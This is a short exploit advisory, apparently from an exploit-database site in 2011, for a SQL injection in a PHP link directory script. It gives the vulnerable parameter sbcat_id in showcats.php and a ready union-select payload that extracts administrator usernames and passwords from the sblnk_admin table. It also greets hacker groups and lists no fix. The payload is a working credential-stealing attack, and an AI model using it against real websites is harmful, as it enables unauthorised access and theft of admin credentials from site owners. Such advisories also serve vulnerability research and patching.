PHP Link Directory Software (sbcat_id) SQL Injection Vulnerability

2011-01-28 10:15:16

==
[|]Author: BorN To K!LL - h4ck3r
[|]Contact: [email protected]
==
[|]Script: PHP link Directory software
[|]Version: n/a
[|]Link: http://www.softbizsolutions.com/php-link-directory-software.php
==
[|]3xploit:
[path]/showcats.php?sbcat_id=[SQL-Injection]

[|]3xample:
[path]/showcats.php?sbcat_id=-9999+union+all+select+1,concat(username,0x3a,password),3,4+from+sblnk_admin--

==
[|]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.